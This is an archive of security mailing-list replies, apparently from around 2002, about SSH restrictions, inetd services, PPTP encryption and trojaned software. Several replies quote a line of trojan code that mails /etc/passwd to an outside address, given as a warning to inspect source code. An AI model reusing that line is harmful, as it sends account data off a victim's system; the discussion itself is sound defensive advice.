Why not just limit the access through SSH public key? It sounds like that would accomplish what you're trying to do. -Anne [EMAIL PROTECTED] grabbed a keyboard and typed... > Hi! > > I want to make ssh-access possible only from a restricted > number of hosts - those that are named in /etc/hosts.allow. > Users who want to login have a DynDNS host-name that shall > be listed in hosts.allow to make it possible for users with > a dial-up internet connection, too. > > BUT: > The problem is that I can only login to the ssh-machine > when I enter the IP-address to the hosts.allow file. > Specifying the hosts DNS-name does not work! > > AND: > I'd prefer to specify the rules for loggin into the machine > in the sshd_config-file, not in hosts.allow/deny. > But the AllowHosts/DenyHosts-options that could be used in > /etc/sshd_config earlier seem to be not any > longer available at the SSH-version I'm using. > It's: openssh-3.4p1-80 on a SuSE 8.1 > > Has anybody ideas in this 2 problems? > > thx in advance, > Klaus > > > > -- > Klaus Siegesleitner - [EMAIL PROTECTED] > SysAdmin at CAME (Center of Applied Molecular Engineering) > University of Salzburg, Jakob-Haringerstrasse 5, A-5020 Salzburg > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgp0.pgp Description: PGP signature
Re: failed ssh breakins on my exposed www box ..
You could also TCP Wrap the services. That drops the BS quite a bit. :) -Anne On Sun, Mar 24, 2002 at 11:44:26AM -0500, Gary MacDougall wrote: > I get these all the time. > > I've come to expect people to do this. It sucks, but hey, > what can you do. I'm fed up trying to report and chase them down. > > We seriouslly need a US branch of the law-enforcement to deal > with this sort of stuff. I think if more people got prosecuted for > trying to crack into a site, the level of BS would drop to zero. > > Yeah, yeah, you can argue all you want about cracking and how > valuable it is to keep a product secure. But if you apply that logic > to the real world, robbing a bank wouldn't be a federal offense, > and it would be like a speeding ticket... > > g. > > > - Original Message - > From: "shiftee" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Sunday, March 24, 2002 11:35 AM > Subject: Re: failed ssh breakins on my exposed www box .. > > > > Hi, > > > > To find out who owns the IP block you can do 'whois -h whois.arin.net > '. > > > > I don't think reporting it would achieve anything, just a friendly > > warning from the ISP to the user in question. > > > > On Sun, Mar 24, 2002 at 08:01:04AM -0800, Stephen Hassard wrote: > > > sorta what I figured, but it was a pretty half assed attempt. :P > > > > > > on a side note, are these typically worth reporting to the ISP of the > > > attacker? I tried doing a DNS lookup on the box in question, but it > > > doesn't seem to have an FDQN registered. What's the best way to figure > > > out the admin for a subnet from a machine's IP? > > > > > > Thanks, > > > Steve > > > > > > shiftee wrote: > > > > It just looks like someone is trying to brute-force an account, I'm > > > > sure there are plenty of places that provide tools for this. > > > > > > > > Just make sure you enforce secure passwords, and keep an eye on your > > > > syslog. > > > > > > > > On Sun, Mar 24, 2002 at 07:11:25AM -0800, Stephen Hassard wrote: > > > > > > > >>Hi there, > > > >> > > > >>I found these in my event log from yesterday: > > > >> > > > >> >>> > > > >>Mar 23 09:33:16 www sshd[10998]: input_userauth_request: illegal user > www > > > >>Mar 23 09:33:18 www sshd[10998]: Failed none for illegal user www from > > > >>213.26.96.103 port 2276 ssh2 > > > >>Mar 23 09:33:18 www sshd[10998]: Failed keyboard-interactive for > illegal > > > >>user www from 213.26.96.103 port 2276 ssh2 > > > >>Mar 23 09:33:18 www sshd[10998]: Failed password for illegal user www > > > >>from 213.26.96.103 port 2276 ssh2 > > > >>Mar 23 09:33:19 www sshd[10997]: input_userauth_request: illegal user > oracle > > > >>Mar 23 09:33:19 www sshd[10997]: Failed none for illegal user oracle > > > >>from 213.26.96.103 port 2275 ssh2 > > > >>Mar 23 09:33:19 www sshd[10997]: Failed keyboard-interactive for > illegal > > > >>user oracle from 213.26.96.103 port 2275 ssh2 > > > >>Mar 23 09:33:19 www sshd[10997]: Failed password for illegal user > oracle > > > >>from 213.26.96.103 port 2275 ssh2 > > > >>Mar 23 09:33:19 www sshd[10999]: input_userauth_request: illegal user > test > > > >>Mar 23 09:33:19 www sshd[10999]: Failed none for illegal user test > from > > > >>213.26.96.103 port 2277 ssh2 > > > >>Mar 23 09:33:19 www sshd[10999]: Failed keyboard-interactive for > illegal > > > >>user test from 213.26.96.103 port 2277 ssh2 > > > >>Mar 23 09:33:20 www sshd[10999]: Failed password for illegal user test > > > >>from 213.26.96.103 port 2277 ssh2 > > > >><<< > > > >> > > > >>It seems that from the timestamp that it's most likely a script kiddy; > > > >>The time duration beween failed password attempts seems really short. > > > >>I'm just wonder if anyone's seen a script that does this and is > > > >>available widely, or is it a good chance that I've got someone trying > to > > > >>break in? None of my other services seem to have been probed, just > ssh. > > > >> > > > >>Thanks, > > > >>Steve > > > >> > > > &g
Re: A question about some network services
On Tue, Apr 02, 2002 at 07:45:21PM +0200, eim wrote: > A question about some network services > == > > Hallo Debian folks, > > By default, on my debian boxes, I disable this network > services which are enabled automaticly during a fresh > Debian stable aka "potato" installtion: > > * daytime > * time > * discard > > All this services are stareted from inet.d / xinet.d > so I can easily disable them via "update-inetd", > so my only question is: > > Why are this services enabled by default and > for 'what' exactly do we need them ? Well, daytime spits out the time of day, time is for NTP, and I'm not sure what discard is used for. I usually turn off inetd completely. It helps makes things quieter on a nessus scan :) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06171/pgp0.pgp Description: PGP signature
Re: A question about some network services
On Tue, Apr 02, 2002 at 01:34:32PM -0500, Noah L. Meyerhans wrote: > > Well, daytime spits out the time of day, time is for NTP, > > and I'm not sure what discard is used for. > No, NTP does not use the time port. It uses port 123 (ntp in > /etc/services). Ok, figures I don't know since I don't use it. > Discard is the network equivalent of /dev/null W.. an MTU of zero :) > The question of what to do with these ports comes up every once in a > while on this list. Some people prefer to leave them on, others turn > them off. I don't think there's ever been an exploit that involves > these ports, as the code is quite simple (i.e. easy to implement > securely). Occasionally, there may be a DOS attack, but nothing invasive. > > I usually turn off inetd completely. It helps makes things > > quieter on a nessus scan :) > Yes, this is good advice, and something that never occurs to most > people. Most common services these days run quite happily in standalone > mode, so there's often no reason to use inetd at all. Given most everything can run through SSH or SSL (at least TCP-based) :) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06205/pgp0.pgp Description: PGP signature
Re: A question about some network services
Generally, I just disable the inetd script from the /etc/init.d directory. You never know if you're going to need it. Removing the package is definitely not the same as disabling it. Michal is right: disable <> wipe it out :) -Anne On Fri, Apr 05, 2002 at 04:31:19PM +0200, Michal Melewski wrote: > > Yikes! I guess, you didn't remove inetd that way, right? But how then? > I think that you should just turn it off :) > 'Don't' use isn't equal to 'wipe it out' > > > Namarie! > > Juku > > -- > Michael "carstein" Melewski| "One day, he said, in a taped segment > [EMAIL PROTECTED] | that suggested chemical interrogation, > mobile: 502 545 913 | everything had gone gray." > gpg: carstein.c.pl/carstein.txt| -- Corto , 'Neuromancer' -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06234/pgp0.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
> And another reason not to run as root...
Compile from source is a good idea too. It's amazing what you
can find in the source. I found a couple of stupid Trojans
that way.
system("mail /etc/passwd [EMAIL PROTECTED]");
*sigh*
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
msg06296/pgp0.pgp
Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 05:46:24PM -0400, Dominique Fortier wrote:
> > Basically, if you run binaries from an unsafe source, you get what you
> > deserve.
>
> Man, I try to be a honnest individual, I hope I don't deserve something
> like that !
>
> ..., Is there such a thing has a 100% safe source for binaries ?
Check the PGP key (or GnuPG key) and the md5 checksum from the source
(as long as you trust the source).
Even trusted sources (like ftp.porcupine.org/pub/security) get hit
with Trojan horses. Always check the digital signatures and the
checksums!
Debian does this when you do an apt-get, I believe.
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
msg06299/pgp0.pgp
Description: PGP signature
Re: Bastian Gl??er/PD/Kreditwerk ist au?er Haus.
No Perl? ;) -Anne On Fri, Apr 12, 2002 at 10:09:27PM +0300, Edmunds wrote: > Hi All, > > I know that Debian origin is Deutchland, but for a good style in mailing > lists I think we should use English or C :) > > Debian user > > > - Original Message - > From: "Dennis Stampfer" <[EMAIL PROTECTED]> > To: "Bastian Gl??er" <[EMAIL PROTECTED]>; > <[EMAIL PROTECTED]> > Sent: Friday, April 12, 2002 8:49 PM > Subject: Re: Bastian Gl??er/PD/Kreditwerk ist au?er Haus. > > > > On Fri, Apr 12, 2002 at 08:33:06PM +0200, Bastian Gl??er wrote: > > > Ich werde ab 26.03.2002 nicht im B?ro sein. Ich kehre zur?ck am > 23.12.2024. > > > > > > Ich werde Ihre Nachricht ?berhaupt nicht mehr beantworten. > > > > oh, no. Will that autoreply continue to 2024? > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > > > > > > > > > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06344/pgp0.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 12:13:46PM +0300, Jussi Ekholm wrote:
> Anne Carasik <[EMAIL PROTECTED]> wrote:
> > Compile from source is a good idea too. It's amazing what you
> > can find in the source. I found a couple of stupid Trojans
> > that way.
> >
> >system("mail /etc/passwd [EMAIL PROTECTED]");
> Oh shit, that's evil. Where did you manage a software including this
> kind of source code in first place? Don't say freshmeat.net! Or
> sourceforge.net... I'm glad you were able to detect this and not run
> the software.
I can't remember, other than some obviously suspect code. It was an ssh
trojan, if I remember correctly.
> Big sigh, indeed. I hate these script kiddies, crackers and people,
> who only does harm to other people online. Was it a take-over of
> an IRC channel, breaking to someone's system or whatever. I just
> hate these people. I've never seen computer, internet connection and
> everything related as a tools to cause harm and destruction. It's
> beyond me, what satisfaction does these persons get...
I don't think they have anything better to do (at least the script
kiddies). Some groups, like in the Middle East and China, feel that
they have a sudden interest in attacking US sites.
However, I'm sure there are other groups attacking the Middle East and
China as well.
You should see some of the stupid stuff script kiddies leave on the
systems--they don't even change the mtime or the logs, not to mention
leave the code behind with URLs in it.
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
msg06385/pgp0.pgp
Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote:
> > Compile from source is a good idea too. It's amazing what you
> > can find in the source. I found a couple of stupid Trojans
> > that way.
> >system("mail /etc/passwd [EMAIL PROTECTED]");
> Yeh, and it's buggy too
> Take a close look at what really happens.
I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;)
Seriously, I know it is. The other thing is, I use shadow most of the
time. Still, the username information is never a good thing to share.
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
msg06386/pgp0.pgp
Description: PGP signature
Re: Guarding against evil software installation scripts?
Dude, and I thought I'm paraniod :) Even I trust the debian sources in /etc/apt/sources.list, not without the PGP key or MD5 of course. Just make sure the digital signature and/or MD5 checksum comes from a trusted source. Unless, of course, you want to write your own code. :) -Anne On Wed, Apr 17, 2002 at 09:52:24PM -0700, Tim Freeman wrote: > At the moment my system has 876 packages installed. They were all > installed by root. Each package gets a chance to run an arbitrary > shell script as root, so it seems to me that there must have been much > more than 876 opportunities for my system to get utterly destroyed by > absolute strangers. So far, none of them decided to do me in. It's > surprising it all works so well. > > This leads to some questions: > > 1. Have there been problems with people submitting malicious packages, >or packages that were so buggy they might have well been malicious? >If so, what happened? > > 2. Are there any ideas about how to tighten this up a bit? Here are >some vague ideas: > > 2a. I can vaguely imagine something where many packages run their >installation scripts under a user id unique to that package, so the >installation script is therefore unable to arbitrarily destroy >everything. > > 2b. It might be possible to do it with only one special user id for >package installs, where a root process chowns everything owned by >the package after the install script is complete, and chowns it >back before an uninstall script runs. You'd need a separate >database that lists which files got chowned so you'll know to chown >them back later. > > 2c. Perhaps something like XFS access lists could be used (if everyone >were running XFS) or SELinux or LIDS (where did the .deb for LIDS go, >by the way?) I have no experience with any of these, so this may be >nonsense. > > I don't see a clear path to doing this the "right" way, where chaos is > prevented by something more substantial than a social convention. > > I have to admit that the social convention is working very well at the > moment, though. > > -- > Tim Freeman > [EMAIL PROTECTED] > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06404/pgp0.pgp Description: PGP signature
Re: Lost root password!!
On Mon, Apr 22, 2002 at 04:12:02PM -0600, Stefan Srdic wrote: > Last night when I attempted to change my root password passwd bunked out on me. It >crashed and I received the following message on the console: > > passwd: Critical error - immediate abort Ooo... > I thought that I could still use my old root password but cannot. I attempted to >boot straight into a shell (init=/bin/sh) and manually expire my root password (so >that I could change it on the next login) and ended up with the same results. I've >also tried deleting the root passwd to see if I could then re-run passwd as root and >change my passwd. No luck. Have you used a rescue disk or installation CD? > I can still log into my system as a normal user but cannot change any users >passwords, I get the same error message as above. Is your /etc/passwd or /etc/shadow have invalid entries or gotten corrupted? > Is passwd in Woody broken? How can I fix my broken root password without harming my >system? I hope not :( -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06468/pgp0.pgp Description: PGP signature
Re: disable RPC
Try # apt-get remove --purge pkgname That will remove anything related to the package (sometimes, the directories aren't removed like /etc/pkgname). Also, try # dpkg --get-selections | grep -i portmap To see other packages related to RPCs.. -Anne On Wed, Apr 24, 2002 at 11:26:16AM -0400, Andrew Kaplan wrote: > How do I disable RPC. I know the scripts can be removed from init.d But I > know there's a command similar to "apt-get remove ???" or something similar. > That removes is completely. > > Andrew P. Kaplan > Network Administrator > CyberShore, Inc. > http://www.cshore.com > > > "Somehow I imagined this experience would be more rewarding" Calvin > > > > > > > --- > Outgoing mail is certified Virus Free. > Checked by AVG anti-virus system (http://www.grisoft.com). > Version: 6.0.332 / Virus Database: 186 - Release Date: 3/6/02 > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06478/pgp0.pgp Description: PGP signature
Re: PPTP with Encryption
Last time I checked, PPTP comes with encryption. All you have to do is configure it. From Freshmeat: PoPToP About: PoPToP is a PPTP server for use in PPTP VPN environments. The current release version supports Windows 95/98/NT/2000 PPTP clients and PPTP Linux clients. With the relevant patches, PoPToP supports Windows PPTP clients with the full range of encryption and authentication features. From apt-cache: pptpd - PoPToP Point to Point Tunneling Server I don't think you should have any patching to do. :) The home page for poptop is at http://www.poptop.org. -Anne On Tue, Apr 30, 2002 at 10:54:24AM -0400, Derek J. Balling wrote: > Does anyone have a nice simple HOWTO on how to add encryption to the > pptpd daemon, so that windows VPN users can connect using encryption? > Preferred methods do NOT include patching things, if possible, > because I'd like to not have to re-patch things every time new > upgrades come out. > > Has anyone built all the necessary items simply as .deb's? > > D > > -- > +-+-+ > | [EMAIL PROTECTED] | "Thou art the ruins of the noblest man | > | Derek J. Balling | That ever lived in the tide of times. | > | | Woe to the hand that shed this costly | > | | blood" - Julius Caesar Act 3, Scene 1 | > +-+-+ > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06538/pgp0.pgp Description: PGP signature
Re: PPTP with Encryption
On Tue, Apr 30, 2002 at 12:03:09PM -0400, Derek J. Balling wrote: > >I don't think you should have any patching to do. :) The home page > >for poptop is at http://www.poptop.org. > Not unless the packaged pptpd/ppp has something else, from the poptop.org > page: > # Available PPPD patch allows Windows compatible encryption and > authentication (MSCHAPv2 and MPPE 40-128 bit RC4 encryption) You're right.. (I guess you do want to encrypt to a Windows box, so make sure you're using full strength RC4.. 40 bit keys can be brute forced). According to the poptop FAQ: 3.0 PPP (and MSCHAPv2/MPPE) Installation It is only necessary to use PPP 2.3.8 if you want Microsoft compatible MSCHAPv2/MPPE authentication and encryption. The reason for this is that the MSCHAPv2/MPPE patch currently supplied (19990813) is against PPP 2.3.8. If you don't need Microsoft compatible authentication/encryption any 2.3.x PPP source will be fine. [...] The instructions look like you need to make a kernel module. > So it seems like theres SOMETHING I need to add to pppd to get > encryption to work with it, and (from my reading) it seems like > there's a patch that also needs to go in the kernel to make that pppd > change work as well. Out of curiousity, why PPTP? Why not IPSec? There's better compatibility with IPSec (FreeSWAN), and it looks like poptop hasn't been updated in a long time (since 1999). Also, Win2K and I think (don't quote me on this) WinXP have builtin IPSec support. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06540/pgp0.pgp Description: PGP signature
Re: PPTP with Encryption
On Tue, Apr 30, 2002 at 01:24:21PM -0400, Derek J. Balling wrote: > >As a side note: have you considered that using the encryption in pptp > >forces you to store userpasswords in cleartext? For my ISP [1] that was > >a reason not to use pptp's encryption, especially since MS-CHAPv2 > >contains known security holes [2]. > > Yes, unfortunately, for our predominant workstation (Win98), M$'s > PPTP client is ubiquitous and other solutions are not necessarily so > commonly deployed. > > D > (who would LOVE to move to a _MORE_ secure solution, but is content, > for now, to only allow himself and one other to even have accounts on > the box with the cleartext passwds) Ugh.. I'd never be content with cleartext passwords, especially given how many security solutions are around today. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06547/pgp0.pgp Description: PGP signature
Re: Safe to use Mindterm?
Security issues? Can you be more specific? There aren't any security issues (yet) with the SSH 2.0 protocol. From what I know, there aren't any issues using mindterm for 2.0 either :) -Anne This one time, Preben Randhol wrote: > Hi > > I'm looking for a way to log into my computer via ssh and a web browser. > I see mindterm can do this, but last I checked it used ssh < 2.0, and I > understood that there where security issues with this. Is that correct? > Are there any replacement software for mindterm? > > Thanks of any hints in advance! > > Preben > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06707/pgp0.pgp Description: PGP signature
Re: Safe to use Mindterm?
I thought there was.. Appgate is charging for it?!? How sad, and they don't even list the price. *Sigh* -Anne This one time, Preben Randhol wrote: > Thanks for your information, it was that I was looking for. I guess > there are no mindterm clones out there with SSH 2.0 support (Open > Source/Free Software of course)? > > > -- > Preben Randhol --- http://www.pvv.org/~randhol/ -- > ?For me, Ada95 puts back the joy in programming.? > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06711/pgp0.pgp Description: PGP signature
Re: force to use SSH2
In sshd_config, make sure you only have protocol 2 defined:
Protocol 2
Then restart sshd.
-Anne
This one time, Eduardo Gargiulo wrote:
> Hi all.
>
> Which is the best way to ensure that clients will connect using ssh2
> and not ssh1? How can I avoid the use of ssh1?
>
> TIA
>
> --
> Eduardo Gargiulo
> ^ejg(-.*)?@ar\.homelinux\.org$
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
msg06715/pgp0.pgp
Description: PGP signature
Re: SSH
It also depends if you've enabled MD5 passwords. If not, you can only use up to 8 characters. -Anne This one time, Pawel Romanek wrote: > > Hi !! > > Then I was playing with sshd I had discovered > that it checks only 8 (first) characters > of my password, the remainder can be omitted ;) > > Is it normal situation or my sshd > is configured incorrectly > (i use default configuration from package) ? > > ssh -V shows: > > OpenSSH_3.0.2p1 Debian 1:3.0.2p1-8, SSH protocols 1.5/2.0, OpenSSL 0x0090603f > > Regards > P.R. > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg06763/pgp0.pgp Description: PGP signature
Re: failed ssh breakins on my exposed www box ..
You could also TCP Wrap the services. That drops the BS quite a bit. :) -Anne On Sun, Mar 24, 2002 at 11:44:26AM -0500, Gary MacDougall wrote: > I get these all the time. > > I've come to expect people to do this. It sucks, but hey, > what can you do. I'm fed up trying to report and chase them down. > > We seriouslly need a US branch of the law-enforcement to deal > with this sort of stuff. I think if more people got prosecuted for > trying to crack into a site, the level of BS would drop to zero. > > Yeah, yeah, you can argue all you want about cracking and how > valuable it is to keep a product secure. But if you apply that logic > to the real world, robbing a bank wouldn't be a federal offense, > and it would be like a speeding ticket... > > g. > > > - Original Message - > From: "shiftee" <[EMAIL PROTECTED]> > To: > Sent: Sunday, March 24, 2002 11:35 AM > Subject: Re: failed ssh breakins on my exposed www box .. > > > > Hi, > > > > To find out who owns the IP block you can do 'whois -h whois.arin.net > '. > > > > I don't think reporting it would achieve anything, just a friendly > > warning from the ISP to the user in question. > > > > On Sun, Mar 24, 2002 at 08:01:04AM -0800, Stephen Hassard wrote: > > > sorta what I figured, but it was a pretty half assed attempt. :P > > > > > > on a side note, are these typically worth reporting to the ISP of the > > > attacker? I tried doing a DNS lookup on the box in question, but it > > > doesn't seem to have an FDQN registered. What's the best way to figure > > > out the admin for a subnet from a machine's IP? > > > > > > Thanks, > > > Steve > > > > > > shiftee wrote: > > > > It just looks like someone is trying to brute-force an account, I'm > > > > sure there are plenty of places that provide tools for this. > > > > > > > > Just make sure you enforce secure passwords, and keep an eye on your > > > > syslog. > > > > > > > > On Sun, Mar 24, 2002 at 07:11:25AM -0800, Stephen Hassard wrote: > > > > > > > >>Hi there, > > > >> > > > >>I found these in my event log from yesterday: > > > >> > > > >> >>> > > > >>Mar 23 09:33:16 www sshd[10998]: input_userauth_request: illegal user > www > > > >>Mar 23 09:33:18 www sshd[10998]: Failed none for illegal user www from > > > >>213.26.96.103 port 2276 ssh2 > > > >>Mar 23 09:33:18 www sshd[10998]: Failed keyboard-interactive for > illegal > > > >>user www from 213.26.96.103 port 2276 ssh2 > > > >>Mar 23 09:33:18 www sshd[10998]: Failed password for illegal user www > > > >>from 213.26.96.103 port 2276 ssh2 > > > >>Mar 23 09:33:19 www sshd[10997]: input_userauth_request: illegal user > oracle > > > >>Mar 23 09:33:19 www sshd[10997]: Failed none for illegal user oracle > > > >>from 213.26.96.103 port 2275 ssh2 > > > >>Mar 23 09:33:19 www sshd[10997]: Failed keyboard-interactive for > illegal > > > >>user oracle from 213.26.96.103 port 2275 ssh2 > > > >>Mar 23 09:33:19 www sshd[10997]: Failed password for illegal user > oracle > > > >>from 213.26.96.103 port 2275 ssh2 > > > >>Mar 23 09:33:19 www sshd[10999]: input_userauth_request: illegal user > test > > > >>Mar 23 09:33:19 www sshd[10999]: Failed none for illegal user test > from > > > >>213.26.96.103 port 2277 ssh2 > > > >>Mar 23 09:33:19 www sshd[10999]: Failed keyboard-interactive for > illegal > > > >>user test from 213.26.96.103 port 2277 ssh2 > > > >>Mar 23 09:33:20 www sshd[10999]: Failed password for illegal user test > > > >>from 213.26.96.103 port 2277 ssh2 > > > >><<< > > > >> > > > >>It seems that from the timestamp that it's most likely a script kiddy; > > > >>The time duration beween failed password attempts seems really short. > > > >>I'm just wonder if anyone's seen a script that does this and is > > > >>available widely, or is it a good chance that I've got someone trying > to > > > >>break in? None of my other services seem to have been probed, just > ssh. > > > >> > > > >>Thanks, > > > >>Steve > > > >> > > > >> > >
Re: A question about some network services
On Tue, Apr 02, 2002 at 07:45:21PM +0200, eim wrote: > A question about some network services > == > > Hallo Debian folks, > > By default, on my debian boxes, I disable this network > services which are enabled automaticly during a fresh > Debian stable aka "potato" installtion: > > * daytime > * time > * discard > > All this services are stareted from inet.d / xinet.d > so I can easily disable them via "update-inetd", > so my only question is: > > Why are this services enabled by default and > for 'what' exactly do we need them ? Well, daytime spits out the time of day, time is for NTP, and I'm not sure what discard is used for. I usually turn off inetd completely. It helps makes things quieter on a nessus scan :) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpfvuUCjhJ8x.pgp Description: PGP signature
Re: A question about some network services
On Tue, Apr 02, 2002 at 01:34:32PM -0500, Noah L. Meyerhans wrote: > > Well, daytime spits out the time of day, time is for NTP, > > and I'm not sure what discard is used for. > No, NTP does not use the time port. It uses port 123 (ntp in > /etc/services). Ok, figures I don't know since I don't use it. > Discard is the network equivalent of /dev/null W.. an MTU of zero :) > The question of what to do with these ports comes up every once in a > while on this list. Some people prefer to leave them on, others turn > them off. I don't think there's ever been an exploit that involves > these ports, as the code is quite simple (i.e. easy to implement > securely). Occasionally, there may be a DOS attack, but nothing invasive. > > I usually turn off inetd completely. It helps makes things > > quieter on a nessus scan :) > Yes, this is good advice, and something that never occurs to most > people. Most common services these days run quite happily in standalone > mode, so there's often no reason to use inetd at all. Given most everything can run through SSH or SSL (at least TCP-based) :) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpTYNkc4r1PK.pgp Description: PGP signature
Re: A question about some network services
Generally, I just disable the inetd script from the /etc/init.d directory. You never know if you're going to need it. Removing the package is definitely not the same as disabling it. Michal is right: disable <> wipe it out :) -Anne On Fri, Apr 05, 2002 at 04:31:19PM +0200, Michal Melewski wrote: > > Yikes! I guess, you didn't remove inetd that way, right? But how then? > I think that you should just turn it off :) > 'Don't' use isn't equal to 'wipe it out' > > > Namarie! > > Juku > > -- > Michael "carstein" Melewski| "One day, he said, in a taped segment > [EMAIL PROTECTED] | that suggested chemical interrogation, > mobile: 502 545 913 | everything had gone gray." > gpg: carstein.c.pl/carstein.txt| -- Corto , 'Neuromancer' -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgp7ISHyL7swr.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
> And another reason not to run as root...
Compile from source is a good idea too. It's amazing what you
can find in the source. I found a couple of stupid Trojans
that way.
system("mail /etc/passwd [EMAIL PROTECTED]");
*sigh*
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
pgpbVsN8QcvSy.pgp
Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 05:46:24PM -0400, Dominique Fortier wrote:
> > Basically, if you run binaries from an unsafe source, you get what you
> > deserve.
>
> Man, I try to be a honnest individual, I hope I don't deserve something
> like that !
>
> ..., Is there such a thing has a 100% safe source for binaries ?
Check the PGP key (or GnuPG key) and the md5 checksum from the source
(as long as you trust the source).
Even trusted sources (like ftp.porcupine.org/pub/security) get hit
with Trojan horses. Always check the digital signatures and the
checksums!
Debian does this when you do an apt-get, I believe.
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
pgpWJvL0nK50k.pgp
Description: PGP signature
